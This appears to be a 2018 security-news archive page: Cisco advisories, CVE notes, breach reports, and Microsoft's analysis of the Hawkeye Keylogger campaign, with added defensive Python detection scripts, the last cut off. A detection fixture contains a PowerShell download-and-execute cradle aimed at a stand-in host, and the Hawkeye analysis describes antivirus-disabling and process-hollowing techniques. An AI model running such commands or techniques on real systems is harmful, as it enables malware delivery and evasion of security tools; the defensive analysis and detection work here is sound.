Daily Archives: July 11, 2018

Nintendo reportedly closes ‘unpatchable’ flaw in new Switch units

Nintendo has been ramping up its anti-piracy measures ever since a Switch hacking team discovered a vulnerability that allows people to run arbitrary code on all current consoles. In fact, it has already overhauled the Switch hardware to get rid of the flaw. While the updated console (codenamed "Mariko") hasn't hit the market yet, the gaming giant might have released patched units in the interim. According to Switch hardware hacker SciresM, some retail units already come with Nvidia Tegra chips that are protected against the security exploit called fusée gelée or "frozen rocket."

Via: Wololo, Gamasutra

Source: SciresM (Twitter)

Panda Restaurants Adds Business Intelligence Technology to 1,960 Stores

3xLOGIC, Inc., a leading provider of integrated, intelligent security solutions, and a three-time Deloitte Technology Fast 500™ winner, today announced that Panda Restaurant Group, Inc. (parent of Panda Express, Panda Inn and Hibachi-San) has completed deployment of 3xLOGIC’s VIGIL Trends Business Intelligence software to all of its North American locations.

Ease the Squeeze – Cyber Security with Small Teams

The competition is fierce, with each team looking to find the best talent and get the most from every member. Sometimes, to fill a position you have to go to your bench, but this is a battle, and you are in it to win it. No, it isn’t the national team looking to grab top honors […]

The post Ease the Squeeze – Cyber Security with Small Teams appeared first on The State of Security.

Timehop Data Breach Affects 21 Million Users

Timehop, an add-on app that resurfaces users' old posts from different social media platforms, suffered a data breach on July 4th that affected 21 million users.

The stolen data includes names, email addresses and dates of birth, as well as the phone numbers of about 4.7 million users who had linked them to their accounts. Users’ old social media posts ("memories") were not compromised.

The attackers got into Timehop’s cloud computing account, which was not protected by multi-factor authentication, and used that access to reach its database and copy the data out.

According to the company, it noticed the breach within two hours of its start and was able to interrupt it, but not before the user data had been taken. Users’ private messages, financial data, social media content, and Timehop data were not affected.

“That stuff is what we cared about, that stuff was protected,” Timehop’s COO Rick Webb said in an interview with TechCrunch. “We have to make a mental note to think about everything else” going forward.

The company has since turned on two-factor authentication for its internal systems and is encrypting its databases to prevent future breaches.

Cisco FireSIGHT System Software URL-Based Access Control Policy Bypass Vulnerability

A vulnerability in the detection engine of Cisco FireSIGHT System Software could allow an unauthenticated, remote attacker to bypass a URL-based access control policy that is configured to block traffic for an affected system.

The vulnerability exists because the affected software incorrectly handles TCP packets that are received out of order when a TCP SYN retransmission is issued. An attacker could exploit this vulnerability by sending a maliciously crafted connection through an affected device. A successful exploit could allow the attacker to bypass a URL-based access control policy that is configured to block traffic for the affected system.

There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180711-firesight-url-bypass


Security Impact Rating: Medium
CVE: CVE-2018-0384

Cisco Firepower System Software SSL Denial of Service Vulnerability

A vulnerability in the detection engine's parsing of Secure Sockets Layer (SSL) protocol packets in Cisco Firepower System Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition by making the Snort process unexpectedly restart.

The vulnerability is due to improper input handling of SSL traffic. An attacker could exploit this vulnerability by sending crafted SSL traffic to the detection engine on the targeted device. A successful exploit could cause a DoS condition: while the Snort process restarts, traffic inspection is bypassed or traffic is dropped.

There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180711-firepwr-ssl-dos


Security Impact Rating: Medium
CVE: CVE-2018-0385

Cisco Web Security Appliance Cross-Site Scripting Vulnerability

A vulnerability in the web-based management interface of Cisco Web Security Appliance (WSA) could allow an unauthenticated, remote attacker to conduct a reflected cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device.

The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive browser-based information.

There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180711-wsa-xss


Security Impact Rating: Medium
CVE: CVE-2018-0366

Cisco Digital Network Architecture Center Credential Logging Information Disclosure Vulnerability

A vulnerability in Cisco Digital Network Architecture (DNA) Center could allow an authenticated, local attacker to access sensitive information on an affected system.

The vulnerability is due to insufficient security restrictions imposed by the affected software. An attacker could exploit this vulnerability by accessing unprotected log files. A successful exploit could allow the attacker to access sensitive log files, which may include system credentials, on the affected device.

There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180711-dnac-id


Security Impact Rating: Medium
CVE: CVE-2018-0368

Cisco StarOS IPv4 Fragmentation Denial of Service Vulnerability

A vulnerability in the reassembly logic for fragmented IPv4 packets of Cisco StarOS running on virtual platforms could allow an unauthenticated, remote attacker to trigger a reload of the npusim process, resulting in a denial of service (DoS) condition. There are four instances of the npusim process running per Service Function (SF) instance, each handling a subset of all traffic flowing across the device. It is possible to trigger a reload of all four instances of the npusim process around the same time.

The vulnerability is due to improper handling of fragmented IPv4 packets containing options. An attacker could exploit this vulnerability by sending a malicious IPv4 packet across an affected device. An exploit could allow the attacker to trigger a restart of the npusim process, which causes all traffic queued toward that instance of the npusim process to be dropped while the process restarts. The npusim process typically restarts within less than a second.

Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180711-staros-dos


Security Impact Rating: High
CVE: CVE-2018-0369

Cisco FireSIGHT System Software File Policy Bypass Vulnerability

A vulnerability in the detection engine of Cisco FireSIGHT System Software could allow an unauthenticated, remote attacker to bypass a file policy that is configured to block the transfer of files to an affected system via FTP.

The vulnerability exists because the affected software incorrectly handles FTP control connections. An attacker could exploit this vulnerability by sending a maliciously crafted FTP connection to transfer a file to an affected device. A successful exploit could allow the attacker to bypass a file policy that is configured to apply the Block upload with reset action to FTP traffic.

There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180711-firesight-file-bypass


Security Impact Rating: Medium
CVE: CVE-2018-0383

Cisco Firepower System Software Detection Engine Denial of Service Vulnerability

A vulnerability in the detection engine of Cisco Firepower System Software could allow an unauthenticated, remote attacker to cause one of the detection engine processes to run out of memory and thus slow down traffic processing.

The vulnerability is due to improper handling of traffic when the Secure Sockets Layer (SSL) inspection policy is enabled. An attacker could exploit this vulnerability by sending malicious traffic through an affected device. An exploit could allow the attacker to increase the resource consumption of a single instance of the Snort detection engine on an affected device. This will lead to performance degradation and eventually the restart of the affected Snort process.

There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180711-firepower-dos


Security Impact Rating: Medium
CVE: CVE-2018-0370

Hacker Sold Stolen U.S. Military Drone Documents On Dark Web For Just $200

You never know what you will find on the hidden Internet 'Dark Web.' Just about an hour ago we reported on someone selling remote access linked to security systems at a major international airport for $10. It has been reported that a hacker was found selling sensitive US Air Force documents on the dark web for between $150 and $200. Cybercrime tracker Recorded Future today

CVE-2018-11045

Pivotal Operations Manager, versions 2.1 prior to 2.1.6 and 2.0 prior to 2.0.15 and 1.12 prior to 1.12.22, contains a static Linux Random Number Generator (LRNG) seed file embedded in the appliance image. An attacker with knowledge of the exact version and IaaS of a running OpsManager could get the contents of the corresponding seed from the published image and therefore infer the initial state of the LRNG.

CVE-2016-0708

Applications deployed to Cloud Foundry, versions v166 through v227, may be vulnerable to remote disclosure of information, including, but not limited to, environment variables and bound service details. For applications to be vulnerable, they must have been staged using automatic buildpack detection, passed through the Java Buildpack detection script, and allow the serving of static content from within the deployed artifact. The default Apache Tomcat configuration in the affected Java buildpack versions is vulnerable to this issue for some basic web application archive (WAR) packaged applications.

CVE-2018-11049

RSA Identity Governance and Lifecycle, RSA Via Lifecycle and Governance, and RSA IMG releases have an uncontrolled search vulnerability. The installation scripts set an environment variable in an unintended manner. A local authenticated malicious user could trick the root user to run malicious code on the targeted system.
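The bug class here is an uncontrolled search path (CWE-427): if any element of the search path can be written by an unprivileged user, or resolves relative to the current directory, that user can plant a binary with the name of a legitimate tool and wait for root to run it. The advisory does not say which variable the install scripts set. The script below is an added example, not RSA's code; it assumes PATH on a POSIX host and audits it for exactly those elements. The sample value and the temporary directories are constructed for the demonstration.

```python
"""Search-path audit for the bug class in the advisory above (CWE-427).

Added example, not RSA's installation scripts.  The advisory does not name
the environment variable, so PATH on a POSIX host is assumed here; the
sample value and the temporary directories are constructed for the demo.
"""
import os
import stat
import tempfile


def path_findings(path_value: str, sep: str = os.pathsep) -> list:
    """Return (element, problem) for each element of a PATH-style value that
    lets an unprivileged user control what a privileged caller executes."""
    findings = []
    for elem in path_value.split(sep):
        if elem in ("", "."):
            # An empty element (leading, trailing or doubled separator) means "."
            findings.append((elem or "<empty>", "resolves to the current working directory"))
        elif not os.path.isabs(elem):
            findings.append((elem, "relative entry, resolved against the caller's cwd"))
        elif os.path.isdir(elem):
            mode = os.stat(elem).st_mode
            # World-writable without the sticky bit: anyone can drop or replace a binary
            if mode & stat.S_IWOTH and not mode & stat.S_ISVTX:
                findings.append((elem, "world-writable directory without sticky bit"))
        # A missing absolute directory is not flagged here; it only becomes a
        # problem if an unprivileged user can later create it.
    return findings


def demo() -> list:
    """Build a PATH with one world-writable dir, an empty element and a relative
    element (all constructed), audit it, and clean up."""
    bad_dir = tempfile.mkdtemp(prefix="cwe427_bad_")
    os.chmod(bad_dir, 0o777)
    good_dir = tempfile.mkdtemp(prefix="cwe427_ok_")
    os.chmod(good_dir, 0o755)
    sample = os.pathsep.join(["/nonexistent/sbin", bad_dir, "", good_dir, "bin"])
    try:
        return path_findings(sample)
    finally:
        os.rmdir(bad_dir)
        os.rmdir(good_dir)


if __name__ == "__main__":
    for elem, problem in demo():
        print(f"{elem}: {problem}")
```

Group-writable directories are deliberately not flagged: whether they are a problem depends on who is in the group, which this offline check cannot know. The same audit applies to any search-path variable (LD_LIBRARY_PATH, PERL5LIB, PYTHONPATH) a privileged script inherits.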

Brazil’s Senate Passes General Data Protection Law

This post has been updated. 

As reported by Mundie e Advogados, on July 10, 2018, Brazil’s Federal Senate approved a Data Protection Bill of Law (the “Bill”). The Bill, which is inspired by the EU General Data Protection Regulation (“GDPR”), is expected to be sent to the Brazilian President in the coming days.

As reported by Mattos Filho, Veiga Filho, Marrey Jr e Quiroga Advogados, the Bill establishes a comprehensive data protection regime in Brazil and imposes detailed rules for the collection, use, processing and storage of personal data, both electronic and physical.

Key requirements of the Bill include:

  • National Data Protection Authority. The Bill calls for the establishment of a national data protection authority which will be responsible for regulating data protection, supervising compliance with the Bill and enforcing sanctions.
  • Data Protection Officer. The Bill requires businesses to appoint a data protection officer.
  • Legal Basis for Data Processing. Similar to the GDPR, the Bill provides that the processing of personal data may only be carried out where there is a legal basis for the processing, which may include, among other bases, where the processing is (1) done with the consent of the data subject, (2) necessary for compliance with a legal or regulatory obligation, (3) necessary for the fulfillment of an agreement, or (4) necessary to meet the legitimate interest of the data controller or third parties. The legal basis for data processing must be registered and documented. Processing of sensitive data (including, among other data elements, health information, biometric information and genetic data) is subject to additional restrictions.
  • Consent Requirements. Where consent of the data subject is relied upon for processing personal data, consent must be provided in advance and must be free, informed and unequivocal, and provided for a specific purpose. Data subjects may revoke consent at any time.
  • Data Breach Notification. The Bill requires notification of data breaches to the data protection authority and, in some circumstances, to affected data subjects.
  • Privacy by Design and Privacy Impact Assessments. The Bill requires organizations to adopt data protection measures as part of the creation of new products or technologies. The data protection authority will be empowered to require a privacy impact assessment in certain circumstances.
  • Data Transfer Restrictions. The Bill places restrictions on cross-border transfers of personal data. Such transfers are allowed (1) to countries deemed by the data protection authority to provide an adequate level of data protection, and (2) where effectuated using standard contractual clauses or other mechanisms approved by the data protection authority.

Noncompliance with the Bill can result in fines of up to two percent of gross sales, limited to 50 million reais (approximately USD 12.9 million) per violation. The Bill will take effect 18 months after it is published in Brazil’s Federal Gazette.

Cisco Releases Security Updates

Original release date: July 11, 2018

Cisco has released updates to address vulnerabilities affecting Cisco products. A remote attacker could exploit one of these vulnerabilities to take control of an affected system.

NCCIC encourages users and administrators to review the following Cisco Security Advisories and apply the necessary updates:




IDG Contributor Network: How are small businesses adopting blockchain technology?

Since its original inception in 2008 to serve as a public transaction ledger for Bitcoin, blockchain technology has come a long way, evolving into something that is useful beyond just cryptocurrency exchanges. Today, blockchain technology – which tremendously increases security and transparency – can be applied to everything from cloud storage to business contracts to payment methods to supply chain management. Individuals, businesses and large enterprises alike are jumping on board to take advantage of the innovative technology and its incredible benefits.

In fact, there is a particularly large uptick in blockchain adoption among small businesses looking to reap the benefits of the technology to help protect and advance their companies – all without breaking the bank. Blockchain has truly become a coveted technological tool for small businesses spanning every industry including finance, real estate, healthcare, education, medicine and more. Since blockchain technology allows for increased security and transparency, this uptick in adoption makes perfect sense. But, before we dive further into specific blockchain applications for small businesses, let’s take a quick look at how the blockchain actually allows for increased security and transparency:


Hacker Puts Airport’s Security System Access On Dark Web Sale For Just $10

If you can't find it on Google, you will definitely find it on the Dark Web. Black markets on the Dark Web are not known just for drugs; they form a massive hidden network where you can buy pretty much anything you can imagine, from pornography, weapons, and counterfeit currencies to hacking tools, exploits, malware, and zero-days. One such type of underground marketplace on the Dark Web is

The CyberWire Daily Briefing 7.11.18

thecyberwire.com - Do you want trending information on hackers, exploits, and vulnerabilities every day for free? Subscribe now to the Recorded Future Cyber Daily. Chinese espionage services are, according to FireEye, …


Tweeted by @thecyberwire https://twitter.com/thecyberwire/status/1017119583503814656

Hawkeye Keylogger – Reborn v8: An in-depth campaign analysis

Much of cybercrime today is fueled by underground markets where malware and cybercriminal services are available for purchase. These markets in the deep web commoditize malware operations. Even novice cybercriminals can buy malware toolkits and other services they might need for malware campaigns: encryption, hosting, antimalware evasion, spamming, and many others.

Hawkeye Keylogger is an info-stealing malware that's being sold as malware-as-a-service. Over the years, the malware authors behind Hawkeye have improved the malware service, adding new capabilities and techniques. It was last used in a high-volume campaign in 2016.

This year marked the resurgence of Hawkeye. In April, malware authors started peddling a new version of the malware that they called Hawkeye Keylogger – Reborn v8. Not long after, on April 30, Office 365 Advanced Threat Protection (Office 365 ATP) detected a high-volume campaign that distributed the latest variants of this keylogger.

At the onset, Office 365 ATP blocked the email campaign and protected customers, 52% of whom are in the software and tech sector. Companies in the banking (11%), energy (8%), chemical (5%), and automotive (5%) industries are also among the top targets.

Figure 1. Top industries targeted by the April 2018 Hawkeye campaign

Office 365 ATP uses intelligent systems that inspect attachments and links for malicious content to protect customers against threats like Hawkeye in real time. These automated systems include a robust detonation platform, heuristics, and machine learning models. Office 365 ATP uses intelligence from various sensors, including multiple capabilities in Windows Defender Advanced Threat Protection (Windows Defender ATP).

Windows Defender AV (a component of Windows Defender ATP) detected and blocked the malicious attachments used in the campaign in at least 40 countries. The United Arab Emirates accounted for 19% of these file encounters, while the Netherlands (15%), the US (11%), South Africa (6%) and the UK (5%) make up the rest of the top 5 countries that saw the lure documents used in the campaign. A combination of generic and heuristic protections in Windows Defender AV (TrojanDownloader:O97M/Donoff, Trojan:Win32/Tiggre!rfn, Trojan:Win32/Bluteal!rfn, VirTool:MSIL/NetInject.A) ensured these threats were blocked in customer environments.

Figure 2. Top countries that encountered malicious documents used in the Hawkeye campaign

As part of our job to protect customers from malware attacks, Office 365 ATP researchers monitor malware campaigns like Hawkeye and other developments in the cybercriminal landscape. Our in-depth investigation into malware campaigns like Hawkeye and many others adds to the vast threat intelligence we get from the Microsoft Intelligent Security Graph, which enables us to continuously raise the bar in security. Through the Intelligent Security Graph, security technologies in Microsoft 365 share signals and detections, allowing these technologies to automatically update protection and detection mechanisms, as well as orchestrate remediation across Microsoft 365.

Figure 3. Microsoft 365 threat protection against Hawkeye

Campaign overview

Despite its name, Hawkeye Keylogger – Reborn v8 is more than a common keylogger. Over time, its authors have integrated various modules that provide advanced functionalities like stealth and detection evasion, as well as credential theft and more.

Malware services like Hawkeye are advertised and sold on the deep web, which requires anonymity networks like Tor to access. Interestingly, the Hawkeye authors advertised their malware and even published tutorial videos on a website on the surface web (since taken down). Even more interesting, based on underground forums, it appears the malware authors have employed intermediary resellers, an example of how cybercriminal underground business models expand and evolve.

Our investigation into the April 2018 Hawkeye campaign shows that the cybercriminals have been preparing for the operation since February, when they registered the domains they later used in the campaign.

Typical of malware campaigns, the cybercriminals undertook the following steps:

  • Built malware samples and malware configuration files using a malware builder they acquired from the underground
  • Built weaponized documents to be used as a social engineering lure (possibly by using another tool bought in the underground)
  • Packed or obfuscated the samples (using a customized open-source packer)
  • Registered domains for delivery of malware
  • Launched a spam campaign (possibly using a paid spam service) to distribute the malware

Like other malware toolkits, Hawkeye comes with an admin panel that cybercriminals use to monitor and control the attack.

Figure 4: Hawkeye's admin panel

Interestingly, some of the methods used in this Hawkeye campaign are consistent with previous attacks. This suggests that the cybercriminals behind this campaign may be the same group responsible for malware operations that delivered the remote access tool (RAT) Remcos and the info-stealing bot malware Loki. The following methods were used in these campaigns:

  • Multiple documents that create a complicated, multi-stage delivery chain
  • Redirections using shortened bit.ly links
  • Use of malicious macro, VBScript, and PowerShell scripts to run the malware; the Remcos campaign employed an exploit for CVE-2017-0199 but used the same domains
  • Consistent obfuscation technique across multiple samples

Point of entry

In late April, Office 365 ATP analysts spotted a new spam campaign with the subject line RFQ-GHFD456 ADCO 5647 deadline 7th May carrying a Word document attachment named Scan Copy 001.doc. While the attachment's file name extension was .doc, it was in fact a malicious Office Open XML format document, which usually uses a .docx file name extension.

In total, the campaign used four different subject lines and five attachments.

Figure 5: Sample emails used in the Hawkeye campaign

Because the attachment contains malicious code, Microsoft Word opens with a security warning. The document uses a common social engineering lure: it displays a fake message and an instruction to Enable editing and Enable content.

Figure 6: The malicious document with social engineering lure

The document contains an embedded frame that connects to a remote location using a shortened URL.

Figure 7: frame in settings.rels.xml on the document

The frame loads an .rtf file from hxxp://bit[.]ly/Loadingwaitplez, which redirects to hxxp://stevemike-fireforce[.]info/work/doc/10.doc.
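Two of the facts above are cheap to check at the mail gateway or in triage: a .doc-named attachment that is really a ZIP container (every Office Open XML document is one), and a relationship part that points outside the package, which is how a frame or remote template pulls in a second stage. The script below is an added example, not part of Microsoft's analysis or tooling. It builds a minimal constructed package in memory; the part name word/_rels/settings.xml.rels and the frame relationship type are assumptions about the layout, and the external target reuses the defanged bit.ly URL quoted above.

```python
"""Triage an Office Open XML attachment for external relationships.

Added example, not code from the Microsoft write-up.  Builds a constructed
.doc-named OOXML package in memory, then checks (1) whether the bytes are a
ZIP container regardless of the file name extension and (2) whether any
relationship part points outside the package (TargetMode="External").
The part name and relationship Type below are assumptions about layout.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
CT_NS = "http://schemas.openxmlformats.org/package/2006/content-types"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
REL_TYPE_BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"


def build_sample_docx() -> bytes:
    """Constructed sample: minimal package whose settings relationships carry
    an external frame target (the defanged URL from the analysis above)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   f'<?xml version="1.0"?><Types xmlns="{CT_NS}"/>')
        z.writestr("word/document.xml",
                   f'<?xml version="1.0"?><w:document xmlns:w="{W_NS}"/>')
        z.writestr("word/_rels/settings.xml.rels",          # assumed part name
                   '<?xml version="1.0"?>'
                   f'<Relationships xmlns="{RELS_NS}">'
                   f'<Relationship Id="rId1" Type="{REL_TYPE_BASE}frame" '
                   'Target="hxxp://bit[.]ly/Loadingwaitplez" TargetMode="External"/>'
                   '</Relationships>')
    return buf.getvalue()


def is_ooxml_container(data: bytes) -> bool:
    """OOXML is a ZIP archive; a legacy .doc is a CFB file (D0 CF 11 E0), not PK."""
    return data[:4] == b"PK\x03\x04"


def external_relationships(data: bytes) -> list:
    """(part name, short relationship type, Target) for every external rel."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") == "External":
                    short_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    hits.append((name, short_type, rel.get("Target")))
    return hits


def triage(filename: str, data: bytes) -> dict:
    """Summarise both checks for one attachment."""
    container = is_ooxml_container(data)
    # Legacy binary extension on a ZIP container is the mismatch seen in this campaign
    ext_mismatch = container and filename.lower().endswith(".doc")
    externals = external_relationships(data) if container else []
    return {"ooxml": container,
            "extension_mismatch": ext_mismatch,
            "external_rels": externals,
            "suspicious": ext_mismatch or bool(externals)}


if __name__ == "__main__":
    for key, value in triage("Scan Copy 001.doc", build_sample_docx()).items():
        print(f"{key}: {value}")
```

Not every external relationship is malicious (hyperlinks are external too), so the short relationship type in the output is what an analyst keys on: frame, attachedTemplate and oleObject targets deserve a look, hyperlink targets usually do not.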

Figure 8: RTF loaded as a frame inside malicious document

The RTF has an embedded malicious .xlsx file with a macro as an OLE object, which in turn contains a stream named PACKAGE that holds the .xlsx contents.

The macro script is mostly obfuscated, but the URL to the malware payload is notably in plaintext.

Figure 9: Obfuscated macro entry point

De-obfuscating the entire script makes its intention clear. The first section uses PowerShell and the System.Net.WebClient object to download the malware to the path C:\Users\Public\svchost32.exe and execute it.

The macro script then terminates both winword.exe and excel.exe. In specific scenarios where Microsoft Word overrides default settings and is running with administrator privileges, the macro can delete Windows Defender AV's malware definitions. It then changes the registry to disable Microsoft Office's security warnings and safety features.

In summary, the campaign's delivery comprises multiple layers of components that aim to evade detection and possibly complicate analysis by researchers.

Figure 10: The campaign's delivery stages
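The macro's download-and-execute step leaves behaviour a SOC can match on even when the document itself is unknown: an Office process spawning a script host with a download cradle on the command line, and a binary with a system-service name running from a user-writable directory. The rules below are an added example, not Microsoft's or Windows Defender ATP's detection logic. They run over constructed JSON-lines events with Sysmon-like fields; the hosts, timestamps and payload URL are made up, while the System.Net.WebClient cradle and the C:\Users\Public\svchost32.exe path are the indicators quoted above.

```python
"""Process-creation rules for the macro behaviour described above.

Added example, not Microsoft's or Windows Defender ATP's detection logic.
Events are constructed JSON lines with Sysmon-like fields (parent image,
image, command line); hosts, timestamps and the payload URL are made up,
the WebClient cradle and C:\\Users\\Public\\svchost32.exe come from the
analysis.
"""
import json
import ntpath

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
DOWNLOAD_MARKERS = ("system.net.webclient", "downloadfile", "downloadstring",
                    "invoke-webrequest", "start-bitstransfer")
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Service-host names malware borrows; genuine copies live only in SYSTEM_DIRS.
LOOKALIKE_PREFIXES = ("svchost", "csrss", "lsass", "winlogon")
PUBLIC_DIR = "c:\\users\\public\\"

# Constructed telemetry, not real logs.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"ts": "2018-04-30T09:12:01Z", "host": "ws01",
     "parent_image": "C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell -w hidden (New-Object System.Net.WebClient)"
                ".DownloadFile('hxxp://payload.example.invalid/x.exe',"
                "'C:\\Users\\Public\\svchost32.exe')"},
    {"ts": "2018-04-30T09:12:04Z", "host": "ws01",
     "parent_image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "image": "C:\\Users\\Public\\svchost32.exe",
     "cmdline": "C:\\Users\\Public\\svchost32.exe"},
    {"ts": "2018-04-30T09:15:00Z", "host": "ws02",           # benign control
     "parent_image": "C:\\Windows\\System32\\services.exe",
     "image": "C:\\Windows\\System32\\svchost.exe",
     "cmdline": "C:\\Windows\\System32\\svchost.exe -k netsvcs"},
    {"ts": "2018-04-30T09:16:00Z", "host": "ws03",           # benign control
     "parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell Get-Process"},
])


def _base(path: str) -> str:
    return ntpath.basename(path).lower()


def office_spawned_downloader(ev: dict):
    """Office parent -> script host child whose command line carries a cradle."""
    if _base(ev["parent_image"]) in OFFICE_APPS and _base(ev["image"]) in SCRIPT_HOSTS:
        cmd = ev["cmdline"].lower()
        if any(marker in cmd for marker in DOWNLOAD_MARKERS):
            return "office app spawned script host with download cradle"
    return None


def system_binary_lookalike(ev: dict):
    """A svchost/csrss/... name whose path is not one of the system directories."""
    name, path = _base(ev["image"]), ev["image"].lower()
    if name.startswith(LOOKALIKE_PREFIXES) and not path.startswith(SYSTEM_DIRS):
        return "system-binary lookalike name outside System32"
    return None


def public_dir_execution(ev: dict):
    """Anything executing from the world-writable C:\\Users\\Public tree."""
    if ev["image"].lower().startswith(PUBLIC_DIR):
        return "executable launched from C:\\Users\\Public"
    return None


RULES = (office_spawned_downloader, system_binary_lookalike, public_dir_execution)


def scan(jsonl: str) -> list:
    """(timestamp, host, image basename, reason) for every rule hit, in event order."""
    alerts = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        for rule in RULES:
            reason = rule(ev)
            if reason:
                alerts.append((ev["ts"], ev["host"], _base(ev["image"]), reason))
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(" | ".join(alert))
```

The first rule is the high-confidence one; the other two are noisier on their own but, chained by host and time as above, they reconstruct the macro, download, execute sequence from the telemetry alone.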

The downloaded payload, svchost32.exe, is a .NET assembly named Millionare that is obfuscated using a custom version of ConfuserEx, a well-known open-source .NET obfuscator.

Figure 11: Obfuscated .NET assembly Millionare showing some of the scrambled names

The obfuscation modifies the .NET assembly's metadata such that all the class and variable names are meaningless, scrambled Unicode names. This obfuscation causes some analysis tools like .NET Reflector to show some namespace or class names as blank, or in some cases, display parts of the code backwards.

Figure 12: .NET Reflector presenting the code backwards due to obfuscation

Finally, the .NET binary loads an unpacked .NET assembly, which includes DLL files embedded as resources in the portable executable (PE).

Figure 13: Loading the unpacked .NET assembly during run-time

Malware loader

The DLL that initiates the malicious behavior is embedded as a resource in the unpacked .NET assembly. It is loaded in memory using process hollowing, a code injection technique that involves spawning a new instance of a legitimate process and then hollowing it out, i.e., replacing the legitimate code with malware.

Figure 14: In-memory unpacking of the malware using process hollowing.

Unlike previous Hawkeye variants (v7), which loaded the main payload into their own process, the new Hawkeye malware injects its code into MSBuild.exe, RegAsm.exe, and VBC.exe, which are signed executables that ship with the .NET Framework. This is an attempt to masquerade as a legitimate process.

Figure 15: Obfuscated calls using .NET reflection to perform the process hollowing injection routine that injects the malware's main payload into RegAsm.exe

Additionally, in the previous version, the process hollowing routine was written in C. In the new version, this routine is completely rewritten in managed .NET code that calls the native Windows API.

Figure 16: Process hollowing routine implemented in .NET using native API function calls

Malware functionalities

The new Hawkeye variants created by the latest version of the malware toolkit have multiple sophisticated functions for information theft and evading detection and analysis.

Information theft

The main keylogger functionality is implemented using hooks that monitor key presses, as well as mouse clicks and window context, along with clipboard hooks and screenshot capability.

It has specific modules for extracting and stealing credentials from the following applications:

  • Beyluxe Messenger
  • Core FTP
  • FileZilla
  • Minecraft (replaced the RuneScape module in previous version)

Like many other malware campaigns, it uses the legitimate BrowserPassView and MailPassView tools to dump credentials from the browser and email client. It also has modules for taking screenshots of the desktop, as well as the webcam, if it exists.

Notably, the malware has a mechanism to visit certain URLs for click-based monetization.

Stealth and anti-analysis

On top of the process hollowing technique, this malware uses other methods for stealth, including deleting the mark of the web (MOTW) alternate data stream from the files it downloads.

This malware can be configured to delay execution by any number of seconds, a technique used mainly to avoid detection by various sandboxes.

It prevents antivirus software from running using an interesting technique. It adds keys under the registry location HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options and sets the Debugger value for certain processes to rundll32.exe, which prevents those processes from executing. It targets the following processes related to antivirus and other security software:

  • AvastSvc.exe
  • AvastUI.exe
  • avcenter.exe
  • avconfig.exe
  • avgcsrvx.exe
  • avgidsagent.exe
  • avgnt.exe
  • avgrsx.exe
  • avguard.exe
  • avgui.exe
  • avgwdsvc.exe
  • avp.exe
  • avscan.exe
  • bdagent.exe
  • ccuac.exe
  • ComboFix.exe
  • egui.exe
  • hijackthis.exe
  • instup.exe
  • keyscrambler.exe
  • mbam.exe
  • mbamgui.exe
  • mbampt.exe
  • mbamscheduler.exe
  • mbamservice.exe
  • MpCmdRun.exe
  • MSASCui.exe
  • MsMpEng.exe
  • msseces.exe
  • rstrui.exe
  • spybotsd.exe
  • wireshark.exe
  • zlclient.exe

Further, it blocks access to certain domains that are usually associated with antivirus or security updates. It does this by modifying the HOSTS file. The list of domains to be blocked is determined by the attacker using a config file.

This malware protects its own processes. It blocks the command prompt, registry editor, and task manager. It does this by modifying registry keys for local group policy administrative templates. It also constantly checks active windows and renders action buttons unusable if the window title matches ProcessHacker, Process Explorer, or Taskmgr.
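The IFEO Debugger hijack, the HOSTS-file blocking of update domains and the policy lockouts described above all leave artifacts that can be read off an exported registry hive and a copied HOSTS file during incident response. The script below is an added example, not Microsoft's tooling: it parses a constructed .reg export and a constructed HOSTS file and reports each of the three artifact types. The value names DisableTaskMgr, DisableRegistryTools and DisableCMD are the standard Windows policy values; the sample key paths, the targeted executables and the av-vendor.example domains were made up for the illustration.

```python
"""Host-side triage for the defence-evasion artifacts described above:
IFEO Debugger hijacks, HOSTS-file sinkholing of update domains, and the
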